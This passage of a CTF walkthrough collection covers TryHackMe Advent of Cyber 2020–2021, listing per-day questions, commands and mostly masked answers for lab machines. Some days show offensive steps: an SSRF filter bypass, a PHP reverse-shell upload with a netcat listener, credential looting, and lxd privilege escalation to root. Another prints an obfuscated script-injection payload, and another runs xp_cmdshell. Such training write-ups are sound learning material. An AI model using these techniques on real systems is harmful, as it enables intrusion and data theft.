target.\n\n\t- ssh elfmceager@, type `yes` and enter the password `adventofcyber`.\n\n- What is the value of local_ch when its corresponding movl instruction is called (first if multiple)?\n\n\t- `./file1`\n\t- `r2 -d ./file1`\n\t- Inside r2> `aa`\n\t- `afl | grep main`\n\t- `pdf @maini`\n\t- `1`\n\n- What is the value of eax when the imull instruction is called?\n\n\t- `db 0x00400b55`\n\t- `pdf @main`\n\t- `dc`\n\t- `px @rbp-0xc`\n\t- `ds`\n\t- `px @rbp-0xc`\n\t- `dr`\n\t- `ds`\n\t- `dr`\n\t- `6`\n\n- What is the value of local_4h before eax is set to 0?\n\n\t- Play with breakpoints and registers\n\t- `6`\n\n\n\n\n### see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-18-The_Bits_of_Christmas/README.md", "content": "# The Bits of Christmas\n\n\nUsername: `cmnatic`\n\nPassword: `Adventofcyber!`\n\n\n- Open the \"TBFC_APP\" application in ILspy and begin decompiling the code\n\n\t- Open `Remmina` on your machine or download it with `sudo apt install remmina`\n\t- Start Remmina, enter the IP, the username and password.\n\t- Open ILSpy, click `File` and open `TBFC_APP`\n\n- What is Santa's password?\n\n\t- In the root folder we see there are a lot of contents. Functions, libraries, main. Then we find a folder called `CrackMe`. Inside that folder there is the Main form code. If you analyze all the code when the button `Sumbit password` is pressed it calls the function `buttonActivate_Click`... mmmh. Let's take a look.\n\t- The first function called is reference to a Module that include this `internal static $ArrayType$$$BY0BB@$$CBD ??_C@_0BB@IKKDFEPG@****************@/* Not supported: data(** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **) */;`. :)\n\t- `*************`\n\n- Now that you've retrieved this password, try to login...What is the flag?\n\n\t- `***{*****}`\n\n\n\n\n### see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-19-The_Naughty_or_Nice_List/README.md", "content": "# The Naughty or Nice List\n\n![santalist](https://github.com/edoardottt/tryhackme-ctf/blob/main/Advent-of-Cyber-2020/Day-19-The_Naughty_or_Nice_List/list.png)\n\n- Once the VM is deployed, connect to the web app: `http://`\n\n- Enter a name in the form and click the \"Search\" button. When the page loads, it should tell you whether that name is on the Naughty List or the Nice List. Notice that the URL for the page looks something like this: `http:///?proxy=http%3A%2F%2Flist.hohoho%3A8080%2Fsearch.php%3Fname%3DTib3rius`\n\n- If we use a URL decoder on the value of the \"proxy\" parameter, we get: `http://list.hohoho:8080/search.php?name=Tib3rius`\n\n- Since \"list.hohoho\" is not a valid hostname on the Internet (.hohoho is not a top-level domain), this hostname likely refers to some back-end machine. It seems that the web app works by taking this URL, making a request at the back-end, and then returning the result to the front-end web app. If the developer has not been careful, we may be able to exploit this functionality using Server-Side Request Forgery (SSRF).\n\n- The most obvious thing we can try to do first is to fetch the root of the same site. Browse to: `http:///?proxy=http%3A%2F%2Flist.hohoho%3A8080%2F` \n\n- This seems to have potential, as in place of the original \"Tib3rius is on the Nice List.\" message, we instead see \"Not Found. The requested URL was not found on this server.\" This seems like a generic 404 message, indicating that we were able to make the server request the modified URL and return the response.\n\n- There are many things we could do now, such as trying to find valid URLs for the \"list.hohoho\" site. We could also try changing the port number from 8080 to something else, to see if we can connect to any other services running on the host, even if these services are not web servers.\n\n- Try changing the port number from 8080 to just 80 (the default HTTP port): `http:///?proxy=http%3A%2F%2Flist.hohoho%3A80`\n\n- The message now changes to \"Failed to connect to list.hohoho port 80: Connection refused\" which suggests that port 80 is not open on list.hohoho.\n\n- Try changing the port number to 22 (the default SSH port): `http:///?proxy=http%3A%2F%2Flist.hohoho%3A22`\n\n- The message now changes to \"Recv failure: Connection reset by peer\" which suggests that port 22 is open but did not understand what was sent (this makes sense, as sending an HTTP request to an SSH server will not get you anywhere!)\n\n- Enumerating open ports via SSRF can be performed in this manner, by iterating over common ports and measuring the differences between responses. Even in cases where error messages aren't returned, it is often possible to detect which ports are open vs closed by measuring the time each request takes to complete.\n\n- Another thing we can try to do with SSRF is access services running locally on the server. We can do this by replacing the list.hohoho hostname with \"localhost\" or \"127.0.0.1\" (among others). Try this now: `http:///?proxy=http%3A%2F%2Flocalhost`\n\n- Oops! It looks like the developer has a check in place for this, as the message returned says \"Your search has been blocked by our security team.\"\n\n- Indeed, if you try other hostnames (e.g. 127.0.0.1, example.com, etc.) they will all be blocked. The developer has implemented a check to ensure that the hostname provided starts with \"list.hohoho\", and will block any hostnames that don't.\n\n- As it turns out, this check can easily be bypassed. Since the hostname simply needs to start with \"list.hohoho\", we can take advantage of DNS subdomains and create our own domain \"list.hohoho.evilsite.com\" which resolves to 127.0.0.1. In fact, we don't even need to buy a domain or configure the DNS, because multiple domains already exist that let us do this. The one we will be using is localtest.me, which resolves every subdomain to 127.0.0.1.\n\n- We can therefore set the hostname in the URL to \"list.hohoho.localtest.me\", bypass the check, and access local services: `http:///?proxy=http%3A%2F%2Flist.hohoho.localtest.me`\n\n- Success! It appears that there is a web server running locally, and it has a message from Elf McSkidy that contains some sensitive information we can use!\n\n- Click the \"Admin\" link at the top or scroll down to the login. Guess the username and use the password you found to login as Santa.\n\n- Delete the naughty list to find the challenge flag!\n\n\n\n\n### see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-20-PowershELlF_to_the_rescue/README.md", "content": "# PowershELlF to the rescue\n\n- Search for the first hidden elf file within the Documents folder. Read the contents of this file. What does Elf 1 want?\n\n\t- `ssh -l mceager `\n\t- Enter the password `r0ckStar!`\n\t- `powershell` and wait until you see a new terminal\n\t- `Set-Location ./Documents/`\n\t- `Get-ChildItem -File`\n\t- `Get-ChildItem -File -Hidden`\n\t- Notice there is a hidden file `e1fone.txt` and a visible `elfone.txt`.\n\t- `Get-Content elfone.txt`\n\t- `Get-Content e1fone.txt`\n\t- `2 front teeth`\n\n- Search on the desktop for a hidden folder that contains the file for Elf 2. Read the contents of this file. What is the name of that movie that Elf 2 wants? \n\t- `cd ..`\n\t- `Set-Location Desktop`\n\t- `Get-Content -File -Hidden`\n\t- `Set-Location .\\elf2wo\\`\n\t- `Get-Content .\\e70smsW10Y4k.txt`\n\t- `Scrooged`\n\n- Search the Windows directory for a hidden folder that contains files for Elf 3. What is the name of the hidden folder? (This command will take a while)\n\n\t- `Set-Location C:\\Windows`\n\t- `Get-ChildItem -Filter \"*3*\" -Recurse -Directory -Hidden -ErrorAction SilentlyContinue`\n\t- `Set-Location .\\System32\\3lfthr3e\\`\n\t- `3lfthr3e`\n\n- How many words does the first file contain?\n\n\t- `Get-Content 1.txt | Measure-Object -Word`\n\t- `9999`\n\n- What 2 words are at index 551 and 6991 in the first file?\n\n\t- `(Get-Content .\\1.txt)[551]`\n\t- `(Get-Content .\\1.txt)[6991]` or `Get-Content 1.txt | Select-Object -Index 551,6991`\n\t- `Red Ryder`\n\n- This is only half the answer. Search in the 2nd file for the phrase from the previous question to get the full answer. What does Elf 3 want? (use spaces when submitting the answer)\n\n\t- `Get-Content 2.txt | Select-String -Pattern \"redryder\"`\n\t- `Red Ryder bb gun`\n\n\n\n\n### see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-21-Time_for_some_ELForensics/README.md", "content": "# Time for some ELForensics\n\nUser name: `littlehelper`\nUser password: `iLove5now!`\n\nOpen Remmina and connect yourself to the remote machine. \n\n- Read the contents of the text file within the Documents folder. What is the file hash for db.exe?\n\n\t- Open PowerShell in remote machine\n\t- `Set-Location Documents`\n\t- `Get-ChildItem`\n\t- `Get-Content '.\\db file hash.txt'`\n\t- `********************856E6A78E3A1`\n\n- What is the file hash of the mysterious executable within the Documents folder?\n\n\t- `Get-FileHash -Algorithm MD5 deebee.exe`\n\t- `********************6EB12AED09F0`\n\n- Using Strings find the hidden flag within the executable?\n\n\t- `C:\\Tools\\strings64.exe -accepteula deebee.exe`\n\t- Read carefully the output\n\t- `THM{*******************************}`\n\n- What is the flag that is displayed when you run the database connector file?\n\n\t- `Get-Item -Path .\\deebee.exe -Stream *`\n\t- `wmic process call create $(Resolve-Path .\\deebee.exe:hidedb)`\n\t- `THM{*******************************}`\n\n\n\n### see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-22-Elf_McEager_becomes_CyberElf/README.md", "content": "# Elf McEager becomes CyberElf\n\nFor Server provide () as the IP address provided to you for the remote machine. The credentials for the user account is:\n\n - User name: `Administrator`\n - User password: `sn0wF!akes!!!`\n\nSo then let's connect ourselves to the remote machine using Remmina.\n\nWe'll use [CyberChef](https://gchq.github.io/CyberChef/) also.\n\n- What is the password to the KeePass database?\n\t\n\t- Open the `dGhlZ3J*******FzaGVyZQ==` folder, then executes the Keepass executable and try to enter the password `mceagerrockstar`. Wrong.\n\t- Open CyberCher and try to decode the folder name.\n\t- Put `dGhlZ3J*******FzaGVyZQ==` in the Input panel and add to recipe `Magic`. It's probably Base64.\n\t- `**************re`\n\t- Let's enter the password inside Keepass.\n\n- What is the encoding method listed as the 'Matching ops'?\n\n\t- You an see this in output panel\n\t- `Base64`\n\n- What is the decoded password value of the Elf Server?\n\n\t- Navigate into Network tab (in Keepass).\n\t- Double click on the unique entry.\n\t- Click on the button to see the password without bullets, read the notes below.\n\t- Paste this in input on CyberChef.\n\t- Use the recipe `From Hex`.\n\t- `********`\n\n- What is the decoded password value for ElfMail?\n\n\t- Switch Keepass tab to see eMail entries.\n\t- Copy the elfMail password and read the notes.\n\t- `i****;3S*****;a*****;i*******g!`\n\t- Paste this input in CyberChef with recipe `From HTML Entity`.\n\t- `********ng!`\n\n- Decode the last encoded value. What is the flag?\n\n\t- Switch Keepass tab to see Recycle Bin entries.\n\t- Open the unique entry.\n\t- The password shown in cleartext without bullets is `nothinghere`. Mhh...\n\t- Let's read the notes.\n\t\n\t\n\t eval(String.fromCharCode(118, 97, 114, 32, 115,44, 32, 49, 49, 53, 44, 32, 53,... [ ... ] ..., 53, 54, 44, 32, 57, 56, 44, 32, 15, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));\n\t\n\t- Put this in CyberCHEF Input and take as recipe `From CharCode`, delimiter `comma`, base `10`.\n\t\n\t .ar somestring = document.createElement('script'); somestring.type = 'text/javascript'; somestring.async = true;somestring.src = String.fromCharCode(104, 104, 116, 116, 112, ... [ ... ] ..., 22, 97, 47); var alls = document.getElementsByTagName('script'); var nt3 = true; for ( var i = alls.length; i--;) { if (alls[i].src.indexOf(String.fromCharCode(49, 49, 100, 51,... [ ... ] ... 56, 98, 56)) > -1) { nt3 = false;} } if(nt3 == true){document.getElementsByTagName(\"head\")[0].appendChild(somestring); }\n\t\n\t- Let's add another rule to the recipe, the same as before. It's seems there are things to be evaluated twice.\n\t- `.https://gist.github.com/heavenraiza/1d321244c4**********d9a3298a88b8`\n\t- `THM{********************************}`\n\n\n\n\n### see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-23-The_Grinch_strikes_again!/README.md", "content": "# The Grinch strikes again!\n\n![win10-ransom](https://github.com/edoardottt/tryhackme-ctf/blob/main/Advent-of-Cyber-2020/Day-23-The_Grinch_strikes_again!/win-ransomware.png)\n\nUse Remmina to connect to the target machine as the documentation in the [proper page](https://tryhackme.com/room/adventofcyber2) tells you.\n\n - User name: `administrator`\n - User password: `sn0wF!akes!!!`\n\n\n- Decrypt the fake 'bitcoin address' within the ransom note. What is the plain text value?\n\n\t- `echo -n \"bm9tb3J************pdmFsY29tcGFueQ==\" | base64 -d`\n\t- `nomore******************`\n\n- At times ransomware changes the file extensions of the encrypted files. What is the file extension for each of the encrypted files?\n\n\t- `.grinch`\n\n- What is the name of the suspicious scheduled task?\n\n\t- `opidsfsdf`\n\n- Inspect the properties of the scheduled task. What is the location of the executable that is run at login?\n\n\t- `C:\\Users\\Administrator\\Desktop\\oidsfsdf.exe`\n\n- There is another scheduled task that is related to VSS. What is the ShadowCopyVolume ID?\n\n\t- `7a9eea15-000-0000-0000-010000000000`\n\n- Assign the hidden partition a letter. What is the name of the hidden folder?\n\n\t- `confidential`\n\n- Right-click and inspect the properties for the hidden folder. Use the 'Previous Versions' tab to restore the encrypted file that is within this hidden folder to the previous version. What is the password within the file?\n\n\t- `*********************`\n\n\n\n# see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-24-The_Trial_Before_Christmas/README.md", "content": "# The Trial Before Christmas\n\n- Scan the machine. What ports are open?\n\n\t- `scilla port -target `, [scilla here](https://github.com/edoardottt/scilla)\n\t- `80, 65000`\n\n- What's the title of the hidden website? It's worthwhile looking recursively at all websites on the box for this step.\n\n\t- `http://:65000`\n\t- `Light Cycle`\n\n- What is the name of the hidden php page?\n\n\t- `gobuster dir -u http://:65000 -x .php -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt`\n\t- `uploads.php`\n\n- What is the name of the hidden directory where file uploads are saved?\n\n\t- `scilla dir -target http:// -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt`\n\t- `grid`\n\n- Bypass the filters. Upload and execute a reverse shell.\n\n\t no answer needed\n\n\t- Navigate to `http://:65000/uploads.php`\n\t- Download [php-reverse-shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php)\n\t- Change the ip from the default to yours ip.\n\t- Upload the file.\n\t- Damn. Invalid file.\n\t- Let's look to the validation.\n\t- Found `assets/js/filter.js`.\n\t~~~\n\tconst filter = file => {\n\t\tif([\"image/png\", \"image/jpeg\", \"image/jpg\"].indexOf(file.type) < 0){\n\t\t\treturn false;\n\t\t} else if ([\"png\", \"jpeg\", \"jpg\"].indexOf(file.name.split(\".\").pop()) < 0){\n\t\t\treturn false;\n\t\t}\n\n\t\t//Let's be honest -- these things are dangerous. May as well always return false ¯\\_(ツ)_/¯\n\t\treturn false;\n\n\t}\n\t~~~\n\t- This instead in `upload.js`\n\t~~~\n\tconst upload = () => {\n\tlet file = uploadInput.files[0];\n\tif(typeof filter === \"function\"){\n\t\tif(!filter(file)){\n\t\t\tchangeMsg(\"Invalid File Type\");\n\t\t\treturn;\n\t\t}\n\t}\n\t~~~\n\t- Mhhh...\n\t- And here we are: `accept=\".png,.jpg,.jpeg\"`\n\t- Rename that file to `rshell.jpg.php`\n\t- We have to avoid the download/usage of `filter.js`.\n\t- We can block it using the Developers Tools (F12) or using Burp.\n\t- *tips* If you are having trouble, clear all the cache/data in browser.\n\t- Move to `http://:65000/grid/`\n\t- On your machine `nc -lnvp 1234`\n\t- Click on the uploaded file.\n\n- What is the value of the web.txt flag?\n\n\t- `python3 -c 'import pty;pty.spawn(\"/bin/bash\")'`\n\t- `cat /var/www/web.txt`\n\t- `THM{**************}`\n\n- Upgrade and stabilize your shell.\n\n\t no answer needed\n\t\n\t- Referred to the first command of the previous task (`python3...`).\n\n- Review the configuration files for the webserver to find some useful loot in the form of credentials. What credentials do you find? username:password\n\n\t- `cd /var/www/TheGrid`\n\t- `ls -alh`\n\t- `cd includes`\n\t- `cat dbauth.php`\n\t- `tron:I****************`\n\n- Access the database and discover the encrypted credentials. What is the name of the database you find these in?\n\n\t- `mysql -u tron -p`\n\t- Enter the password.\n\t- `show databases;`\n\t- `tron`\n\n- Crack the password. What is it?\n\n\t- `show tables;`\n\t- `use users;`\n\t- `select * from users;`\n\t~~~\n\t+----+----------+----------------------------------+\n\t| id | username | password |\n\t+----+----------+----------------------------------+\n\t| 1 | flynn | ed*********d19a13*********\t |\n\t+----+----------+----------------------------------+\n\t~~~\n\t- `hash-identifier`\n\t- [crackstation](https://crackstation.net/)\n\t- `**********`\n\n- Use su to login to the newly discovered user by exploiting password reuse.\n\n\t no answer needed\n\n\t- Exit from mysql client with `exit`.\n\t- `su flynn`\n\t- Enter the password\n\n- What is the value of the user.txt flag?\n\n\t- `cd ~`\n\t- `ls`\n\t- `cat flag.txt`\n\t- `THM{********_****_***********}`\n\n- Check the user's groups. Which group can be leveraged to escalate privileges?\n\n\t- `id`\n\t- `lxd`\n\n- Abuse this group to escalate privileges to root.\n\n\t no answer needed\n\n\t- Check with `lxc image list` on target machine which containers are available locally.\n\t~~~\n\t+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+\n\t| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |\n\t+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+\n\t| Alpine | a569b9af4e85 | no | alpine v3.12 (20201220_03:48) | x86_64 | 3.07MB | Dec 20, 2020 at 3:51am (UTC) |\n\t+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+\n\t~~~\n\t- `lxc init IMAGENAME CONTAINERNAME -c security.privileged=true`\n\t- `lxc config device add CONTAINERNAME DEVICENAME disk source=/ path=/mnt/root recursive=true`\n\t- `lxc start CONTAINERNAME`\n\t- `lxc exec CONTAINERNAME /bin/sh`\n\t- `id`\t\n\n- What is the value of the root.txt flag?\n\n\t- `cd /mnt/root/root`\n\t- `THM{***********}`\n\n\t~~~\n\t\"As Elf McEager claimed the root flag a click could be heard as a small chamber on the anterior of the NUC popped open. Inside, McEager saw a small object, roughly the size of an SD card. As a moment, he realized that was exactly what it was. Perplexed, McEager shuffled around his desk to pick up the card and slot it into his computer. Immediately this prompted a window to open with the word 'HOLO' embossed in the center of what appeared to be a network of computers. Beneath this McEager read the following: Thank you for playing! Merry Christmas and happy holidays to all!\"\n\t~~~\n\n\n# Have a nice XMas !!!\n" }, { "path": "Advent-of-Cyber-2020/README.md", "content": "# Advent of Cyber 2020 🎄🎅\n\n## [tryhackme.com/edoardottt](https://tryhackme.com/p/edoardottt)\n\n![advent](https://github.com/edoardottt/tryhackme-ctf/blob/main/Advent-of-Cyber-2020/advent.png)\n\nThese are all the things I have produced during my Advent of Cyber 2020. I hope you will have fun as I had completing this AoC.\n\nPlease, before emailing me, be sure you've read all the introduction part above the questions; really it's a good source to learn new things.\n\n![thm-certificate](https://github.com/edoardottt/tryhackme-ctf/blob/main/Advent-of-Cyber-2020/thm-certificate.png)\n" }, { "path": "Advent-of-Cyber-2021/Day-01-Save_The_Gifts/README.md", "content": "# Day 1 - Save the gifts\n\nThe trick is to change the user id until you find the correct one.\n\n- After finding Santa's account, what is their position in the company?\n\n\t- `*********`\n\n- After finding McStocker's account, what is their position in the company?\n\n\t- `*************`\n\n- After finding the account responsible for tampering, what is their position in the company?\n\n\t- `***************`\n\n- What is the received flag when McSkidy fixes the Inventory Management System?\n\n\t- `THM{*****************}`\n\n- If you want to learn more about IDOR vulnerabilities, we suggest trying out this room https://tryhackme.com/room/idor\n\n\t\tNo answer needed\n\n- Tasks released each day get progressively harder (but are still guided with walkthrough videos). Come back tomorrow for Day 2's task!\n\n\t\tNo answer needed" }, { "path": "Advent-of-Cyber-2021/Day-02-Elf_HR_Problems/README.md", "content": "# Day 2 Elf HR Problems\n\n- Open the static site in a new tab, here.\n\n\t\tno answer needed\n\n- Register an account, and verify the cookies using the Developer Tools in your browser.\n\n- What is the name of the new cookie that was created for your account?\n\n\t- Go in the developer tools using F12 and then look at the application tab, then under cookies you will find the cookies.\n\t- `*********`\n\n- What encoding type was used for the cookie value?\n\n\t- Go to [CyberChef](https://gchq.github.io/CyberChef/), insert the cookie value as input and insert magic as recipe.\n\t- `***********`\n\n\n- What object format is the data of the cookie stored in?\n\n\t- `***n`\n\n- Manipulate the cookie and bypass the login portal.\n\n- What is the value of the administrator cookie? (username = admin)\n\n\t- Just go on CyberChef and do the inverse, change the user from yours to 'admin' and compute \"To Hex\".\n\t- `******************...***************`\n\n- What team environment is not responding?\n\n\t- `**`\n\n- What team environment has a network warning?\n\n\t- `**********`\n\n- If you want to learn more about Authentication bypasses, we suggest trying out this room https://tryhackme.com/jr/authenticationbypass \n\n\t\tNo answer needed\n\nTasks released each day get progressively harder (but are still guided with walkthrough videos). Come back tomorrow for Day 3's task, where InsiderPHD will be recording a video walkthrough!" }, { "path": "Advent-of-Cyber-2021/Day-03-Christmas_Blackout/README.md", "content": "# Day 3 - Christmas Blackout\n\n\n- Using a common wordlist for discovering content, enumerate http://MACHINE_IP to find the location of the administrator dashboard. What is the name of the folder?\n\n\t- `*****`\n\n\n- In your web browser, try some default credentials on the newly discovered login form for the \"administrator\" user. What is the password?\n\n\t- `***************`\n\n\n- Access the admin panel. What is the value of the flag?\n\n\t- `********************`" }, { "path": "Advent-of-Cyber-2021/Day-04-Santas_Running_Behind/README.md", "content": "# Day 4 - Santa's Running Behind\n\n\n\n- Access the login form at http://MACHINE_IP\n\n\t\tNo answer needed\n\n- Configure Burp Suite & Firefox, submit some dummy credentials and intercept the request. Use intruder to attack the login form.\n\n\t\tNo answer needed\n\nWhat valid password can you use to access the \"santa\" account?\n\n\t- `******`\n\n- What is the flag in Santa's itinerary?\n\n\t- `***************`" }, { "path": "Advent-of-Cyber-2021/Day-05-Pesky_Elf_Forum/README.md", "content": "# Day 5 - Pesky Elf Forum\n\n\n- What flag did you get when you disabled the plugin?\n\n\t- `*****************`" }, { "path": "Advent-of-Cyber-2021/Day-06-Patch_Management_Is_Hard/README.md", "content": "# Day 6 - Patch Management Is Hard\n\n- Deploy the attached VM and look around. What is the entry point for our web application?\n\n\t- `err`\n\n- Use the entry point to perform LFI to read the /etc/flag file. What is the flag?\n\n\t- `***************************`\n\n- Use the PHP filter technique to read the source code of the index.php. What is the $flag variable's value?\n\n\t- `***************************`\n\nMcSkidy forgot his login credential. Can you help him to login in order to recover one of the server's passwords?\nNow that you read the index.php, there is a login credential PHP file's path. Use the PHP filter technique to read its content. What are the username and password?\n\n\t- `MCSkidy:**********`\n\n- Use the credentials to login into the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server? \n\n\t- `**************************`\n\n- The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.\n\n\t- `**************************************`\n\n- Bonus: The current PHP configuration stores the PHP session files in /tmp. Use the LFI to call the PHP session file to get your PHP code executed. \n\n\t\tNo answer needed\n" }, { "path": "Advent-of-Cyber-2021/Day-07-Migration_Without_Security/README.md", "content": "# Day 7 - Migration Without Security\n\n- Interact with the MongoDB server to find the flag. What is the flag?\n\n - `***{********************************}`\n\nWe discussed how to bypass login pages as an admin. Can you log into the application that Grinch Enterprise controls as admin and retrieve the flag?\n\nUse the knowledge given in AoC3 day 4 to setup and run Burp Suite proxy to intercept the HTTP request for the login page. Then modify the POST parameter.\n\n - `***{********************************}`\n\n- Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?\n\n - `***{********************************}`\n\n- Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?\n\n - `*************************************`\n" }, { "path": "Advent-of-Cyber-2021/Day-08-Santas_Bag_of_Toys/README.md", "content": "# Day 8 - Santa's Bag of Toys\n\n\nRead the premise above, start the attached Windows analysis machine and find the transcription logs in the SantasLaptopLogs folder on the Desktop.\n\nIf you want to RDP into the machine, start the AttackBox and enter the following into a terminal: `xfreerdp /u:Administrator /p:grinch123! /v:MACHINE_IP`\n\n- The credentials for the machine are Administrator as the username, and grinch123! as the password.\n\n\t\tNo answer needed\n\nEach transcription log is a simple plain text file that you can open in any editor of your choice. While the filenames are random, you can get an idea as to which log \"comes first\" by looking at the Date Modified or Date Created attributes, or the timestamps just before the file extension!\n\nOpen the first transcription log. You can see the commands and output for everything that ran within PowerShell, like whoami and systeminfo!\n\n- What operating system is Santa's laptop running (\"OS Name\")?\n\n\t- `********* ******* ** ***`\n\nReview each transcription log to get an idea for what activity was performed on the laptop just after it went missing. In the \"second\" transcription log, it seems as if the perpetrator created a backdoor user account!\n\n- What was the password set for the new \"backdoor\" account?\n\n\t- `********************`\n\n- In one of the transcription logs, the bad actor interacts with the target under the new backdoor user account, and copies a unique file to the Desktop. Before it is copied to the Desktop, what is the full path of the original file? \n\n\t- `*:*****************************************************.***`\n\nThe actor uses a Living Off The Land binary (LOLbin) to encode this file, and then verifies it succeeded by viewing the output file. What is the name of this LOLbin?\n\n- Read the above and open the ShellBagsExplorer.exe application found in the folder on your Desktop.\n\n\t\tNo answer needed\n\nWith ShellBagsExplorer.exe open, use the top-bar menu to select File -> Load offline hive and navigate to the location of where you saved the decoded UsrClass.dat . Load in the UsrClass.dat file and begin to explore the Shellbags discovered!\n\nUnder the Desktop folder, there seems to be a suspicious folder named \"SantaRat\". Could this be a remote access trojan, that was used for further nefarious activity on Santa's laptop? Unfortunately, from just Shellbags alone, we only have insight into folder names (sometimes files, if we are lucky) and column data within Windows Explorer, but not files... how could we uncover more details?\n\n- Drill down into the folders and see if you can find anything that might indicate how we could better track down what this SantaRat really is. What specific folder name clues us in that this might be publicly accessible software hosted on a code-sharing platform?\n\n\t- `******`\n\nAdditionally, there is a unique folder named \"Bag of Toys\" on the Desktop! This must be where Santa prepares his collection of toys, and this is certainly sensitive data that the actor could have compromised. What is the name of the file found in this folder? \n\n- What is the name of the user that owns the SantaRat repository?\n\n\t- `**********`\n\n- Explore the other repositories that this user owns. What is the name of the repository that seems especially pertinent to our investigation?\n\n\t- `*********************`\n\n- Read the information presented in this repository. It seems as if the actor has, in fact, compromised and tampered with Santa's bag of toys! You can review the activity in the transcription logs. It looks as if the actor installed a special utility to collect and eventually exfiltrate the bag of toys. What is the name of the executable that installed a unique utility the actor used to collect the bag of toys?\n\n\t- `*****************.***`\n\nIn the last transcription log, you can see the activity that this actor used to tamper with Santa's bag of toys! It looks as if they collected the original contents with a UHA archive. A UHA archive is similar to a ZIP or RAR archive, but faster and with better compression rates. It is very rare to see, but it looks the Grinch Enterprises are pulling out all the tricks!\n\nYou can see the actor compressed the original contents of the bag of toys with a password. Unfortunately, we are unable to see what the specific password was in these transcription logs! Perhaps we could find it elsewhere...\n\nFollowing this, the actor looks to have removed everything from the bag of toys, and added in new things like coal, mold, worms, and more! What are the contents of these \"malicious\" files (coal, mold, and all the others)?\n\n\nWe know that the actor seemingly collected the original bag of toys. Maybe there was a slight OPSEC mistake, and we might be able to recover Santa's Bag of Toys! Review the actor's repository for its planned operations... maybe in the commit messages, we could find the original archive and the password!\n\n- What is the password to the original bag_of_toys.uha archive? (You do not need to perform any password-cracking or bruteforce attempts)\n\n\t- `***************************`\n\nMcSkidy was able to download and save a copy of the bag_of_toys.uha archive, and you have it accessible on the Desktop of the Windows analysis machine. After uncovering the password from the actor's GitHub repository, you have everything you need to restore Santa's original bag of toys!! \n\nDouble-click on the archive on the desktop to open a graphical UHARC extraction utility that has been prepared for you. Using the password you uncovered, extract the contents into a location of your choosing (you might make a \"Bag of Toys\" directory on the Desktop to save all the files into).\n\nWith that, you have successfully recovered the original contents of Santa's Bag of Toys! You can view these in the Windows Explorer file browser to see how many were present.\n\n- How many original files were present in Santa's Bag of Toys?\n\n\t- `***`\n" }, { "path": "Advent-of-Cyber-2021/Day-09-Where_Is_All_This_Data_Going/README.md", "content": "# Day 9 - Where Is All This Data Going\n\n- In the HTTP #1 - GET requests section, which directory is found on the web server?\n\n - `*****`\n\n- What is the username and password used in the login page in the HTTP #2 - POST section? \n\n - `*******************`\n\n- What is the User-Agent's name that has been sent in HTTP #2 - POST section?\n\n - `***************************************`\n\n- In the DNS section, there is a TXT DNS query. What is the flag in the message of that DNS query?\n\n - `*******************************`\n\n- In the FTP section, what is the FTP login password?\n\n - `**********`\n\n- In the FTP section, what is the FTP command used to upload the secret.txt file?\n\n - `****`\n\n- In the FTP section, what is the content of the secret.txt file?\n\n - `*********`\n" }, { "path": "Advent-of-Cyber-2021/Day-10-Offensive_Is_The_Best_Defence/README.md", "content": "# Day10 - Offensive Is The Best Defence\n\n- Help McSkidy and run nmap -sT MACHINE_IP. How many ports are open between 1 and 100?\n\n\t- `*`\n\n- What is the smallest port number that is open?\n\n\t- `**`\n\n- What is the service related to the highest port number you found in the first question?\n\n\t- `****`\n\n- Now run nmap -sS MACHINE_IP. Did you get the same results? (Y/N)\n\n\t- `*`\n\n- If you want Nmap to detect the version info of the services installed, you can use nmap -sV MACHINE_IP. What is the version number of the web server?\n\n\t- `*****************`\n\n- By checking the vulnerabilities related to the installed web server, you learn that there is a critical vulnerability that allows path traversal and remote code execution. Now you can tell McSkidy that Grinch Enterprises used this vulnerability. What is the CVE number of the vulnerability that was solved in version 2.4.51?\n\n\t- `**************`\n\n- You are putting the pieces together and have a good idea of how your web server was exploited. McSkidy is suspicious that the attacker might have installed a backdoor. She asks you to check if there is some service listening on an uncommon port, i.e. outside the 1000 common ports that Nmap scans by default. She explains that adding -p1-65535 or -p- will scan all 65,535 TCP ports instead of only scanning the 1000 most common ports. What is the port number that appeared in the results now?\n\n\t- `*****`\n\n- What is the name of the program listening on the newly discovered port?\n\n\t- `*******`\n\nIf you would like to learn more about the topics covered in today’s tasks, we recommend checking out the Network Security module.\n\n\t\tNo answer needed\n" }, { "path": "Advent-of-Cyber-2021/Day-11-Where_Are_The_Reindeers/README.md", "content": "# Day 11 - Where Are The Reindeers?\n\n- There is an open port related to MS SQL Server accessible over the network. What is the port number?\n\n\t- `nmap -Pn `\n\t- `****`\n\n- If the connection is successful, you will get a prompt. What is the prompt that you have received?\n\n\t- `sqsh -S -U sa -P t7uLKzddQzVjVFJp`\n\t- `**`\n\n- We can see four columns in the table displayed above: id, first (name), last (name), and nickname. What is the first name of the reindeer of id 9?\n\n\t- `*******`\n\n- Check the table schedule. What is the destination of the trip scheduled on December 7?\n\n\t- `select * from reindeer.dbo.schedule;`\n\t- `******`\n\n- Check the table presents. What is the quantity available for the present “Power Bank”?\n\n\t- `select * from reindeer.dbo.presents;`\n\t- `*****`\n\n- There is a flag hidden in the grinch user's home directory. What are its contents?\n\n\t- `xp_cmdshell 'dir C:\\Users\\grinch';`\n\t- `xp_cmdshell 'dir C:\\Users\\grinch\\Documents';`\n\t- `xp_cmdshell 'type C:\\Users\\grinch\\Documents\\flag.txt';`\n\t- `***************`" }, { "path": 